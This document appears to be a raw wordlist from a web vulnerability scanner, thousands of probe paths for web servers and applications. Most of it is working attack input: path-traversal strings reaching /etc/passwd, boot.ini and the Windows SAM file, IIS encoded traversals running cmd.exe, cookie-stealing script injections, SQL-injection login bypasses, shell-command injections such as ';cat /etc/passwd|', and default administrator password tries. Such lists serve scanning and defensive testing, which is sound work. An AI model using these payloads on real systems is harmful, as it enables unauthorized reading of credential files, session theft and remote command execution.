666%0a%0a666.jsp 852566C90012664F %00 %00/ %00/ %00/ %00/ %0a%0a.jsp %2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/windows/win.ini %2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd %2e/ %2e/ %2e/ %2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd %2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../boot.ini %2f/ %2f/ %2f/ %3c/a%3e%3cscript%3ealert(%22xss%22)%3c/script%3e %3c/title%3e%3cscript%3ealert(%22xss%22)%3c/script%3e %3cscript%3ealert(%22xss%22)%3c/script%3e/index.html %3f.jsp %3f.jsp %3f.jsp %3f.jsp %5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini %5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini %5c/ %5c/ %5c/ %22%3cscript%3ealert(%22xss%22)%3c/script%3e %NETHOOD%/ %a%s%p%d <script>alert('Vulnerable');</script> *.* .%252e/.%252e/.%252e/winnt/boot.ini ..%2F..%2F..%2F..%2F..%2F../windows/repair/sam ..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam ..%2F..%2F..%2F..%2F..%2F../winnt/repair/sam._ ..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cboot.ini ..%5C..%5C..%5C..%5C..%5C..%5C/winnt/win.ini ..%252f..%252f..%252f..%252f..%252f../windows/repair/sam ..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam ..%252f..%252f..%252f..%252f..%252f../winnt/repair/sam._ ..%255c..%255c..%255c..%255c..%255c../windows/repair/sam ..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam ..%255c..%255c..%255c..%255c..%255c../winnt/repair/sam._ ................../config.sys ................../etc/passwd .../.../.../ .../.../.../.../.../.../.../.../.../.../etc/passwd .../.../.../.../.../.../.../.../.../boot.ini ../../../../../../../../../../etc/passwd ../../../../../../../../../boot.ini ../../../../winnt/repair/sam._ ../config.dat ../webserver.ini ..\..\..\..\..\..\temp\temp.class ..\\..\\..\\..\\..\\..\\..\\boot.ini ./ ./ ./../../../../../../../../../etc/* ./../../../../../../../../../etc/passw* .DS_Store .DS_Store .FBCIndex .FBCIndex .access .addressbook .bash_history .bashrc .cobalt/sysManage/../admin/.htaccess .forward .history .htaccess .htpasswd .lynx_cookies .mysql_history .nsconfig .nsf/../winnt/win.ini .passwd .perf .pinerc .plan .proclog .procmailrc .profile .psql_history .rhosts .sh_history .ssh .ssh/authorized_keys .ssh/known_hosts .www_acl .wwwacl / / / // ///../../data/config/microsrv.cfg ///./../.../boot.ini ///////../../../../../../etc/passwd /////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// //etc/hosts //etc/passwd /OA_HTML/_pages/ /admin/admin.shtml /admin/aindex.htm /comment.php?mode=Delete&sid=1&cid=<script>alert(document.cookie)</script> /profiles.php?what=contact&author=ich&authoremail=bla%40bla.com&subject=hello&message=text&uid=<script>alert(document.cookie)</script> .aspx .jsp .shtm .shtml .stm .thtml ?D=A ?M=A ?N=D ?Open ?OpenServer ?PageServices ?S=A ?\"> ?mod=&op=browse ?mod=node&nid=some_thing&op=view ?mod=some_thing&op=browse ?pattern=/etc/*&sort=name ?sql_debug=1 ?wp-cs-dump ADMINconfig.php ASP/cart/database/metacart.mdb Admin/ Admin_files/ Admin_files/order.log Administration/ Agent/ Agentes/ Agents/ Asp/ BACLIENT CFIDE/administrator/index.cfm CFIDE/administrator/index.cfm CFIDE/probe.cfm COM COM CSNews.cgi CVS/Entries Citrix/ICAWEB/ Citrix/MetaFrameXP/default/login.asp Citrix/PNAgent/ Config1.htm DB4Web/10.10.10.10:100 DEASAppDesign.nsf DEASLog01.nsf DEASLog02.nsf DEASLog03.nsf DEASLog04.nsf DEASLog05.nsf DEASLog.nsf DEESAdmin.nsf DMR/ Data/settings.xml+ DomainFiles/*//../../../../../../../../../../etc/passwd EXE/ Excel/ GW5/GWWEB.EXE?HELP=bad-request GWWEB.EXE?HELP=bad-request Gozila.cgi HyperStat/stat_what.log IBMWebAS/ IBMWebAS/apidocs/ IBMWebAS/configDocs/ IBMWebAS/docs/ IBMWebAS/mbeanDocs/ IDSWebApp/IDSjsp/Login.jsp ISSamples/SQLQHit.asp ISSamples/sqlqhit.asp IlohaMail/blank.html JUNK(5).csp JUNK(5).htw JUNK(5).xml JUNK(5)/ JUNK(6).cfm?mode=debug JUNK(10) JUNK(10) JUNK(10)abcd.html JUNK(223) modules/Search/index.php modules/Submit/index.php?op=pre&title= modules/WebChat/in.php+ modules/WebChat/out.php modules/WebChat/quit.php modules/WebChat/users.php modules/Your_Account/navbar.php+ moregroupware/modules/webmail2/inc/ movimientos/ mp3/ mpcsoftweb_guestbook/database/mpcsoftweb_guestdata.mdb mqseries/ msadc/..%255c..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c msadc/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir+c:%5c msadc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir msadc/Samples/SELECTOR/showcode.asp?|-|0|404_Object_Not_Found msadc/Samples/selector/showcode.asp?source=/msadc/Samples/../../../../../../../../../winnt/win.ini msadc/msadcs.dll msadc/samples/adctest.asp msadm/domain/index.php3?account_name=\"> msadm/site/index.php3?authid=\"> msadm/user/login.php3?account_name=\"> msdwda.nsf mspress30/ msql/ msword/ mtatbls.nsf mtdata/mtstore.nsf mtstore.nsf musicqueue.cgi myguestBk/add1.asp?|-|0|404_Object_Not_Found myguestBk/admin/delEnt.asp?id=NEWSNUMBER|-|0|404_Object_Not_Found myguestBk/admin/index.asp?|-|0|404_Object_Not_Found myhome.php?action=messages&box= myinvoicer/config.inc mylog.html?screen=/etc/passwd mylog.phtml?screen=/etc/passwd myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent myphpnuke/links.php?op=MostPopular&ratenum=[script]alert(document.cookie);[/script]&ratetype=percent myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query= myphpnuke/links.php?op=search&query=[script]alert('Vulnerable);[/script]?query= mysql/db_details_importdocsql.php?submit_show=true&do=import&docpath=../../../../../../../etc na_admin/ na_admin/ataglance.html names.nsf nav/cList.php?root= netutils/findata.stm?user= netutils/ipdata.stm?ipaddr= netutils/whodata.stm?sitename= new new/ news news/news.mdb newtopic.php newuser?Image=../../database/rbsserv.mdb nikto.ida nl/ nntp/nd000000.nsf nntp/nd000001.nsf nntp/nd000002.nsf nntp/nd000003.nsf nntp/nd000004.nsf nntppost.nsf node/view/666\"> nosuchurl/> notes.nsf noticias/ nph-showlogs.pl?files=../../../../../../../../etc/&filter=.*&submit=Go&linecnt=500&refresh=0 nph-showlogs.pl?files=../../../../../../../../etc/passwd&filter=.*&submit=Go&linecnt=500&refresh=0 nphp/nphpd.php npn_admn.nsf npn_rn.nsf ns-icons/ nsn/..%5Cutil/attrib.bas nsn/..%5Cutil/chkvol.bas nsn/..%5Cutil/copy.bas nsn/..%5Cutil/del.bas nsn/..%5Cutil/dir.bas nsn/..%5Cutil/dsbrowse.bas nsn/..%5Cutil/glist.bas nsn/..%5Cutil/lancard.bas nsn/..%5Cutil/md.bas nsn/..%5Cutil/rd.bas nsn/..%5Cutil/ren.bas nsn/..%5Cutil/send.bas nsn/..%5Cutil/set.bas nsn/..%5Cutil/slist.bas nsn/..%5Cutil/type.bas nsn/..%5Cutil/userlist.bas nsn/..%5Cweb/env.bas nsn/..%5Cweb/fdir.bas nsn/..%5Cwebdemo/env.bas nsn/..%5Cwebdemo/fdir.bas nsn/env.bas nsn/fdir.bas nsn/fdir.bas:ShowVolume ntsync4.nsf ntsync45.nsf nuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid nul..cfm nul..dbm nul.cfm nul.dbm null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full oc/Search/SQLQHit.asp oc/Search/sqlqhit.asp odbc/ oekaki/ oem_webstage/cgi-bin/oemapp_cgi oem_webstage/oem.conf officescan/cgi/cgiChkMasterPwd.exe officescan/cgi/jdkRqNotify.exe officescan/hotdownload/ofscan.ini ojspdemos/basic/hellouser/hellouser.jsp ojspdemos/basic/simple/usebean.jsp ojspdemos/basic/simple/welcomeuser.jsp old/ open? openautoclassifieds/friendmail.php?listing=<script>alert(document.domain);</script> openautoclassifieds/friendmail.php?listing= opendir.php?/etc/passwd opendir.php?requesturl=/etc/passwd oprocmgr-status options.inc.php+ options.php?optpage= oracle oradata/ order/ order/order_log.dat order/order_log_v12.dat orders/ orders/checks.txt orders/mountain.cfg orders/order_log.dat orders/order_log_v12.dat orders/orders.log orders/orders.txt oscommerce/default.php outgoing/ owa_util%2esignature ows-bin/oaskill.exe?abcde.exe ows-bin/oasnetconf.exe?-l%20-s%20BlahBlah ows-bin/perlidlc.bat?&dir ows/ ows/restricted%2eshow pafiledb/includes/team/file.php page.cgi?../../../../../../../../../../etc/passwd pages/ pages/htmlos/%3Cscript%3Ealert('Vulnerable');%3C/script%3E parse_xml.cgi pass_done.php passwd passwd.adjunct passwd.txt passwdfile password password.inc password/ passwords.txt passwords/ path/nw/article.php?id=' path/nw/article.php?id=' pbserver/..%255c..%255c..%255cwinnt/system32/cmd.exe?/c+dir pbserver/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir pbserver/pbserver.dll pccsmysqladm/incs/dbconnect.inc pdf/ people.list perl5/ perl5/files.pl perl-status perl/ perl/-e%20%22system('cat%20/etc/passwd');\%22 perl/-e%20print%20Hello perl/env.pl perl/files.pl perl/printenv perl/samples/env.pl perl/samples/lancgi.pl perl/samples/ndslogin.pl perl/samples/volscgi.pl perweb.nsf pforum/edituser.php?boardid=&agree=1&username=%3Cscript%3Ealert('Vulnerable')%3C/script%3E&nickname=test&email=test@example.com&pwd=test&pwd2=test&filled=1 phorum/admin/footer.php?GLOBALS[message]= phorum/admin/header.php?GLOBALS[message]= phorum/admin/stats.php photo/ photo/manage.cgi photo_album/apa_phpinclude.inc.php photodata/ photodata/manage.cgi php-coolfile/action.php?action=edit&file=config.php php-coolfile/action.php?action=edit&file=config.php php.ini php/ php/gaestebuch/admin/index.php php/index.php php/mlog.html php/mlog.phtml php/mylog.html?screen=/etc/passwd php/mylog.phtml?screen=/etc/passwd php/php4ts.dll php/php.exe?c:\boot.ini php/php.exe?c:\winnt\boot.ini phpBB2/includes/db.php phpBB2/search.php?search_id=1\ phpBB/phpinfo.php phpBB/viewtopic.php?t=17071&highlight=\">\" phpBB/viewtopic.php?topic_id= phpEventCalendar/file_upload.php phpMyAdmin/ phpclassifieds/latestwap.php?url= phpimageview.php?pic=javascript:alert('Vulnerable') phpinfo.php phpinfo.php3 phpinfo.php3?VARIABLE= phpinfo.php?GLOBALS[test]= phpinfo.php?VARIABLE= phpinfo.php?cx[]=JUNK(4096) phpmyadmin/ phpnuke/html/.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid phpnuke/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid phpping/index.php?pingto=www.test.com%20|%20dir%20c:\ phprank/add.php?page=add&spass=1&name=2&siteurl=3&email=%3Cscript%3Ealert(Vulnerable)%3C/script%3E phprocketaddin/?page=../../../../../../../../../../boot.ini phprocketaddin/?page=../../../../../../../../../../etc/passwd phpshare/phpshare.php phptonuke.php?filnavn=/etc/passwd phptonuke.php?filnavn= phpwebchat/register.php?register=yes&username=OverG&email=&email1= phpwebfilemgr/index.php?f=../../../../../../../../../etc phpwebfilemgr/index.php?f=../../../../../../../../../etc/passwd phpwebsite/index.php?module=calendar&calendar[view]=day&month=2&year=2003&day=1+%00\"> phpwebsite/index.php?module=calendar&calendar[view]=day&year=2003%00-1&month= phpwebsite/index.php?module=fatcat&fatcat[user]=viewCategory&fatcat_id=1%00+\"> phpwebsite/index.php?module=pagemaster&PAGE_user_op=view_page&PAGE_id=10\">&MMN_position=[X:X] phpwebsite/index.php?module=search&SEA_search_op=continue&PDA_limit=10\"> pics/ piranha/secure/passwd.php3 pix/ pks/lookup pls/admin pls/dadname/htp.print?cbuf= pls/help/ pls/ldc/admin_/ pls/portal30/admin_/ pls/portal/CXTSYS.DRILOAD.VALIDATE_STMT pls/portal/HTP.PRINT pls/portal/PORTAL.home pls/portal/PORTAL.wwa_app_module.link pls/portal/PORTAL.wwv_dynxml_generator.show pls/portal/PORTAL.wwv_form.genpopuplist pls/portal/PORTAL.wwv_main.render_warning_screen?p_oldurl=inTellectPRO&p_newurl=inTellectPRO pls/portal/PORTAL.wwv_setting.render_css pls/portal/PORTAL.wwv_ui_lovf.show pls/portal/PORTAL_DEMO.ORG_CHART.SHOW pls/portal/SELECT pls/portal/null pls/portal/owa_util.cellsprint?p_theQuery=select pls/portal/owa_util.cellsprint?p_theQuery=select+*+from+sys.dba_users pls/portal/owa_util.listprint?p_theQuery=select pls/portal/owa_util.show_query_columns?ctable=sys.dba_users pls/portal/owa_util.showsource?cname=owa_util pls/portal/owa_util.signature pls/sample/admin_/help/..%255cplsql.conf pls/simpledad/admin_/ pls/simpledad/admin_/adddad.htm?%3CADVANCEDDAD%3E pls/simpledad/admin_/dadentries.htm pls/simpledad/admin_/gateway.htm?schema=sample pls/simpledad/admin_/globalsettings.htm pm.php?function=sendpm&to=VICTIM&subject=SUBJECT&images=javascript:alert('Vulnerable')&message=MESSAGE&submitpm=Submit pm/lib.inc.php pm_buddy_list.asp?name=A&desc=B%22%3E%3Ca%20s=%22&code=1 pmlite.php pms.php?action=send&recipient=DESTINATAIRE&subject=happy&posticon=javascript:alert('Vulnerable')&mode=0&message=Hello poll polls poppassd.php3+ porn/ postinfo.html postnuke/html/index.php?module=My_eGallery postnuke/html/modules.php?op=modload&name=News&file=article&sid= postnuke/index.php?module=My_eGallery postnuke/modules.php?op=modload&name=Web_Links&file=index&req=viewlinkdetails&lid=666&ttitle=Mocosoft pp.php?action=login pr0n/ prd.i/pgen/ privado/ private.nsf private/ prod/ produccart/pdacmin/login.asp?|-|0|404_Object_Not_Found product_info.php productcart/database/EIPC.mdb productcart/pc/Custva.asp?|-|0|404_Object_Not_Found profile.php?u=JUNK(8) profiles.php?uid=<script>alert(document.cookie)</script> project/index.php?m=projects&user_cookie=1 prometheus-all/index.php pron/ proplus/admin/login.php+-d+\"action=insert\"+-d+\"username=test\"+-d+\"password=test\" protected/ protected/secret.html+ protectedpage.php?uid='%20OR%20''='&pwd='%20OR%20''=' protection.php proxy/ssllogin?user=administrator&password=administrator proxy/ssllogin?user=administrator&password=operator proxy/ssllogin?user=administrator&password=user prueba/ pruebas/ prxdocs/misc/prxrch.idq?CiTemplate=../../../../../../../../../../winnt/win.ini pt_config.inc ptg_upgrade_pkg.log pub/ pub/english.cgi?op=rmail public.nsf public/ publica/ publicar/ publico/ publisher/ purchase/ purchases/ put/cgi-bin/putport.exe?SWAP&BOM&OP=none&Lang=en-US&PutHtml=../../../../../../../../etc/passwd pvote/add.php?question=AmIgAy&o1=yes&o2=yeah&o3=well..yeah&o4=bad%20 pvote/ch_info.php?newpass=password&confirm=password%20 pvote/del.php?pollorder=1%20 pw/ pw/storemgr.pw pwd.db python/ qpadmin.nsf query.idq?CiTemplate=../../../../../../../../../../winnt/win.ini quickplace/quickplace/main.nsf quickstart/qstart50.nsf quickstart/wwsample.nsf quikmail/nph-emumail.cgi?type=../%00 quikstore.cfg quikstore.cgi reademail.pl readme readme.eml readme.nsf readme.txt readmec.nsf readmes.nsf register/ registered/ replymsg.php?send=1&destin= reports.nsf reports/ reports/rwservlet reports/rwservlet/getjobid4?server=myrep reports/rwservlet/getjobid7?server=myrep reports/rwservlet/showenv reports/rwservlet/showjobs reports/rwservlet/showmap reports/rwservlet/showmap?server=myserver reports/rwservlet?server=repserv+report=/tmp/hacker.rdf+destype=cache+desformat=PDF reports/temp/ reseller/ restricted/ retail/ reviews/newpro.cgi room/save_item.php root/ rpc.php?q="> rpc.php?q='&t=' rpc/..%255c..%255cwinnt/system32/cmd.exe?/c+dir rpc/..%c0%af../..%c0%af../winnt/system32/cmd.exe?/c+dir rtm.log rubrique.asp?no=%60/etc/passwd%60|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'`'. rubrique.asp?no=....//....//....//....//....//....//....//etc.passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. rubrique.asp?no=../../../../../../../../../etc/passwd%00|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. rubrique.asp?no=/....../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. rubrique.asp?no=/.../.../.../.../.../.../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. rubrique.asp?no=/../../../../../../../../../../../../../../../../../../../../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. rubrique.asp?no=/../../../../../../etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. rubrique.asp?no=/../../../etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. rubrique.asp?no=/.\"./.\"./.\"./.\"./.\"./boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. rubrique.asp?no=/etc/passwd%00|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. rubrique.asp?no=/etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'/'. rubrique.asp?no=c:\boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_'c:'. sales/ sam sam._ sam.bin sample/ sample/faqw46 sample/framew46 sample/pagesw46 sample/siregw46 sample/site1w4646 sample/site2w4646 sample/site3w4646 samples/ samples/search.dll?query= samples/search/queryhit.htm save/ sca/menu.jsp schema50.nsf scozbook/view.php?PG=whatever scr/ scratch screen.php script>alert('Vulnerable').cfm scripts scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+dir scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+ver scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:\" scripts/CGImail.exe scripts/Carello/Carello.dll scripts/admin.pl scripts/cfgwiz.exe scripts/contents.htm scripts/convert.bas scripts/counter.exe scripts/cphost.dll scripts/cpshost.dll scripts/db4web_c.exe/dbdirname/c%3A%5Cboot.ini scripts/fpadmcgi.exe scripts/fpadmin.htm scripts/fpcount.exe scripts/fpremadm.exe scripts/fpsrvadm.exe scripts/httpodbc.dll scripts/iisadmin/bdir.htr scripts/iisadmin/ism.dll scripts/no-such-file.pl scripts/postinfo.asp scripts/proxy/w3proxy.dll scripts/repost.asp scripts/root.exe?/c+dir+c:\+/OG scripts/samples/ctguestb.idc scripts/samples/details.idc scripts/samples/search/author.idq scripts/samples/search/filesize.idq scripts/samples/search/filetime.idq scripts/samples/search/qfullhit.htw scripts/samples/search/qsumrhit.htw scripts/samples/search/queryhit.idq scripts/samples/search/simple.idq scripts/samples/search/webhits.exe scripts/tools/ctss.idc scripts/tools/dsnform scripts/tools/dsnform.exe scripts/tools/getdrvrs.exe scripts/tools/newdsn.exe scripts/tradecli.dll scripts/tradecli.dll?template=nonexistfile?template=..\..\..\..\..\winnt\system32\cmd.exe?/c+dir scripts/weblog scripts/wsisa.dll/WService=anything?WSMadmin se/?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse search97.vts search.asp?Search= search.asp?Search=\"><script>alert(Vulnerable)</script> search.asp?term=<%00script>alert('Vulnerable') search.php?mailbox=INBOX&what=x&where=&submit=Search search.php?searchfor=\"> search.php?searchstring= search.php?sess=your_session_id&lookfor=<script>alert(document.cookie)</script> search.php?zoom_query= search.vts search/ search/?SectionIDOverride=1&SearchText= search/SQLQHit.asp search/htx/SQLQHit.asp search/htx/sqlqhit.asp search/inc/ search/index.cfm? search/results.stm?query=<script>alert('vulnerable');</script> search/sqlqhit.asp search?NS-query-pat=../../../../../../../../../../etc/passwd search?NS-query-pat=..\..\..\..\..\..\..\..\..\..\boot.ini secret.nsf secret/ secure/ securecontrolpanel/ secured/ securelogin/1,2345,A,00.html security/web_access.html sell/ sendphoto.php server-info server-status server/ server_stats/ servers/link.cgi service/ services/ servicio/ servicios/ servlet/AdminServlet servlet/ContentServer?pagename= servlet/CookieExample?cookiename= servlet/Counter servlet/DateServlet servlet/FingerServlet servlet/HelloWorldServlet servlet/IsItWorking servlet/MsgPage?action=test&msg= servlet/PrintServlet servlet/SchedulerTransfer servlet/SearchServlet servlet/ServletManager servlet/SessionManager servlet/SessionServlet servlet/SimpleServlet servlet/SnoopServlet servlet/SnoopServlet servlet/admin?category=server&method=listAll&Authorization=Digest+username%3D%22admin%22%2C+response%3D%22ae9f86d6beaa3f9ecb9a5b7e072a4138%22%2C+nonce%3D%222b089ba7985a883ab2eddcd3539a6c94%22%2C+realm%3D%22a servlet/allaire.jrun.ssi.SSIFilter servlet/com.livesoftware.jrun.plugins.ssi.SSIFilter servlet/com.newatlanta.servletexec.JSP10Servlet/ servlet/com.newatlanta.servletexec.JSP10Servlet/..%5c..%5cglobal.asa servlet/com.unify.servletexec.UploadServlet servlet/custMsg?guestName= servlet/gwmonitor servlet/oracle.xml.xsql.XSQLServlet/xsql/lib/XSQLConfig.xml servlet/org.apache.catalina.ContainerServlet/ servlet/org.apache.catalina.Context/ servlet/org.apache.catalina.Globals/ servlet/org.apache.catalina.servlets.WebdavStatus/ servlet/sq1cdsn servlet/sqlcdsn servlet/sunexamples.BBoardServlet servlet/webacc servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../boot.ini%00 servlet/webacc?User.html=../../../../../../../../../../../../../../../../../../etc/passwd%00 servlet/webacc?User.html=noexist servlet/webpub servlets/MsgPage?action=badlogin&msg= servlets/SchedulerTransfer servlets/weboam/oam/oamLogin session/admnlogin setpasswd.cgi settings/site.ini setup.exe?&page=list_users&user=P setup.nsf setup/ setupweb.nsf sgdynamo.exe?HTNAME= shop/ shop/database/metacart.mdb shop/member_html.cgi?file=;cat%20/etc/passwd| shop/member_html.cgi?file=|cat%20/etc/passwd| shop/normal_html.cgi?file=<script>alert(\"Vulnerable\")</script> shop/normal_html.cgi?file=../../../../../../etc/issue%00 shop/normal_html.cgi?file=;cat%20/etc/passwd| shop/normal_html.cgi?file=|cat%20/etc/passwd| shop/php_files/site.config.php+ shop/search.php shop/show.php shopa_sessionlist.asp shopadmin.asp shopadmin.asp?Password=abc&UserName="> shopdbtest.asp shopexd.asp?catalogid='42 shoponline/fpdb/shop.mdb shopper/ shopping300.mdb shopping400.mdb shopping/database/metacart.mdb shopping/diag_dbtest.asp shopping/shopdisplayproducts.asp?id=1&cat= shoppingdirectory/midicart.mdb shoutbox.php?conf=../../../../../../../etc/passwd shoutbox/expanded.php?conf=../../../../../../../etc/passwd%20 showcat.php?catid=<Script>JavaScript:alert('Vulnerable');</Script> showmail.pl showmail.pl?Folder= signon simplebbs/users/users.php sips/sipssys/users/a/admin/user site/' site/' site/eg/source.asp site/iissamples/ site_searcher.cgi sitemap.xml siteminder siteminder/smadmin.html siteseed/ siteserver/publishing/viewcode.asp?source=/default.asp smbcfg.nsf smconf.nsf smency.nsf smg_Smxcfg30.exe?vcc=3560121183d3 smhelp.nsf smmsg.nsf smquar.nsf smsolar.nsf smssend.php smtime.nsf smtp.box smtp.nsf smtpibwq.nsf smtpobwq.nsf smtptbls.nsf smvlog.nsf soap/servlet/soaprouter soapConfig.xml soapdocs/ReleaseNotes.html soapdocs/webapps/soap/ soapdocs/webapps/soap/WEB-INF/config/soapConfig.xml software.nsf software/ soinfo.php?\"> solaris/ some.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42 some.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42 some.php?=PHPE9568F36-D428-11d2-A769-00AA001ACF42 source/ spelling.php3+ splashAdmin.php spwd sql/ sqldump.sql sqlnet.log sqlqhit.asp squirrelmail/src/read_body.php src/ src/read_body.php?mailbox=%3Cscript%3Ealert(Vulnerable)%3C%2Fscript%3E&passed_id=%3Cscript%3Ealert(Vulnerable)%3C%2Fscript%3E&startMessage=1&show_more=0 srchadm srvinst.nsf srvnam.htm srvstatus.chl+ ss000007.pl?PRODREF= ss.cfg ssdefs/ ssdefs/siteseed.dtd sshome/ ssi/ ssi/envout.bat?|dir%20..\\..\\..\\..\\..\\..\\..\\ staff/ start.php?config=alper.inc.php stat.htm stat/ staticpages/index.php statistic/ statistics/ statmail.nsf statrep.nsf stats.htm stats.html stats.txt stats/ status.php3 status/ status?full=true stauths.nsf stautht.nsf stconf.nsf stconfig.nsf stdnaset.nsf stdomino.nsf stlog.nsf store/ streg.nsf stronghold-info stronghold-status structure.sql stsrc.nsf style/ styles/ stylesheet/ stylesheets/ subir/ submit.php?subject=&story=&storyext=&op=Preview submit?setoption=q&option=allowed_ips&value=255.255.255.255 sun/ sunshop.index.php?action=storenew&username= super_stats/access_logs super_stats/error_logs support/ support/common.php?f=0&ForumLang=../../../../../../../../../../etc/passwd support/messages supporter/index.php supporter/index.php?t=ticketfiles&id=<script></script> supporter/index.php?t=tickettime&id=<script></script> supporter/index.php?t=updateticketlog&id=<script></script> supporter/tupdate.php surf/scwebusers sw000.asp?|-|0|404_Object_Not_Found swf sys/ syshelp/cscript/showfnc.stm?pkg= syshelp/cscript/showfncs.stm?pkg= syshelp/cscript/showfunc.stm?func= syshelp/stmex.stm?foo=123&bar= syshelp/stmex.stm?foo= syslog.htm?%20 system/ sysuser/docmgr/create.stm?path= sysuser/docmgr/edit.stm?name= sysuser/docmgr/edit.stm?path= sysuser/docmgr/ftp.stm?path= sysuser/docmgr/htaccess.stm?path= sysuser/docmgr/iecreate.stm?path= sysuser/docmgr/iecreate.stm?template=../ sysuser/docmgr/ieedit.stm?name= sysuser/docmgr/ieedit.stm?path= sysuser/docmgr/ieedit.stm?url=../ sysuser/docmgr/info.stm?name= sysuser/docmgr/info.stm?path= sysuser/docmgr/mkdir.stm?path= sysuser/docmgr/rename.stm?name= sysuser/docmgr/rename.stm?path= sysuser/docmgr/search.stm?path= sysuser/docmgr/search.stm?query= sysuser/docmgr/sendmail.stm?name= sysuser/docmgr/sendmail.stm?path= sysuser/docmgr/template.stm?path= sysuser/docmgr/update.stm?name= sysuser/docmgr/update.stm?path= sysuser/docmgr/vccheckin.stm?name= sysuser/docmgr/vccheckin.stm?path= sysuser/docmgr/vccreate.stm?name= sysuser/docmgr/vccreate.stm?path= sysuser/docmgr/vchist.stm?name= sysuser/docmgr/vchist.stm?path= tar/ tarjetas/ tcb/files/auth/r/root technote/print.cgi temp/ template/ templates/form_header.php?noticemsg= templates/form_header.php?noticemsg= temporal/ test test.htm test.html test.nsf test.php test.php%20 test.php?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x test.shtml?%3CSCRIPT%3Ealert('Vulnerable')%3C%2FSCRIPT%3E=x test.txt test/ test/info.php test/jsp/Language.jsp test/jsp/buffer1.jsp test/jsp/buffer2.jsp test/jsp/buffer3.jsp test/jsp/buffer4.jsp test/jsp/declaration/IntegerOverflow.jsp test/jsp/extends1.jsp test/jsp/extends2.jsp test/jsp/pageAutoFlush.jsp test/jsp/pageDouble.jsp test/jsp/pageExtends.jsp test/jsp/pageImport2.jsp test/jsp/pageInfo.jsp test/jsp/pageInvalid.jsp test/jsp/pageIsErrorPage.jsp test/jsp/pageIsThreadSafe.jsp test/jsp/pageSession.jsp test/phpinfo.php test/realPath.jsp testing/ tests/ texis.exe/?-dump texis.exe/?-version texis/websearch/phine thebox/admin.php?act=write&username=admin&password=admin&aduser=admin&adpass=admin theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter,/system/status/session theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter\">,/system/status/session theme1/selector?button=status,monitor,session&button_url=/system/status/status\">,/system/status/moniter,/system/status/session theme1/selector?button=status,monitor,session\">&button_url=/system/status/status,/system/status/moniter,/system/status/session themes/mambosimple.php?detection=detected&sitename= ticket.php?id=99999 tiki/ tiki/tiki-install.php tinymsg.php tmp/ tmp_view.php?file=/etc/passwd today.nsf tomcat-docs/index.html tools/ topic/entete.php topsitesdir/edit.php tpv/ trabajo/ trace.axd trafficlog/ transito/ tree tree/ trees/ tsweb/ ttforum/index.php ttp://127.0.0.1:2301/ tutos/file/file_new.php tutos/file/file_select.php tvcs/getservers.exe?action=selects1 typo3/typo3/dev/translations.php typo3conf/ typo3conf/database.sql typo3conf/localconf.php uifc/MultFileUploadHandler.php+ upd/ updates/ upload.asp upload.cgi+ upload.php?type=\" uploader.php uploadn.asp uploadx.asp url.jsp 